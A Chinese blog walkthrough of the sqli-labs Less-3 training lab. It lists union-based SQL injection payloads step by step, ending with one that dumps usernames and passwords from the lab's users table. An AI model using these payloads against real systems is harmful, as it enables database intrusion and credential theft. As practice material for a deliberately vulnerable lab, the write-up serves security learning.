SQL注入实例(sqli-labs/less-3)

魏大橙2024-08-04 12:34

0、初始页面

1、确定闭合字符

确定为字符型注入

复制代码 
?id=1 and 1=1 
?id=1 and 1=2

确定闭合字符为 ')

复制代码 
?id=1'
?id=1')

2、确定表的列数

确定查询表的列数为3

复制代码 
?id=1') order by 3 --+

3、确定回显位置

确定回显位置为第二列和第三列

复制代码 
?id=-1') union select 1,2,3 --+

4、爆库名

当前所在数据库为security

复制代码 
?id=-1') union select 1,user(),database() --+

5、爆表名

查看users表

复制代码 
?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'security' --+

6、爆列名

复制代码 
?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users' --+

7、显示最终结果

复制代码 
?id=-1%27) union select 1,2,group_concat(username,0x3a,password) from security.users --+
相关推荐
白菜!!!5 分钟前
SQL中IF、IFNULL、NULLIF、ISNULL函数的使用
数据库·sql·mysql
H_老邪12 分钟前
redis 安装
数据库·redis·缓存
m0_7432974215 分钟前
Python在金融科技(FinTech)中的应用
jvm·数据库·python
llxxyy卢15 分钟前
polar-web部分中等题目
android·前端·sql·web安全
霖霖总总17 分钟前
[Redis小技巧17]深入解析 Redis 缓存穿透:原理、防御策略与布隆过滤器实践
数据库·redis·缓存
2401_8578652344 分钟前
Python日志记录(Logging)最佳实践
jvm·数据库·python
爱可生开源社区1 小时前
SCALE 二月榜单发布:新增三款国内外大模型,新增模型测评实验室!
数据库
m0_716667071 小时前
趣味项目与综合实战
jvm·数据库·python
m0_662577971 小时前
Python虚拟环境(venv)完全指南:隔离项目依赖
jvm·数据库·python
霖霖总总1 小时前
[Redis小技巧16]Redis 安全加固与加密传输指南:从基础到高级策略
数据库·redis
热门推荐
01GitHub 镜像站点02Qwen3.5 开源全解析:从 0.8B 到 397B,代际升级 + 全场景选型指南03OpenClaw 使用和管理 MCP 完全指南04UV安装并设置国内源05OpenClaw Control UI安全上下文访问配置06OpenClaw macOS 完整安装与本地模型配置教程(实战版)07Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services08本地部署 OpenClaw + DeepSeek-R1 完全指南09小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)10AI 编程三剑客:Spec-Kit、OpenSpec、Superpowers 深度对比与实战指南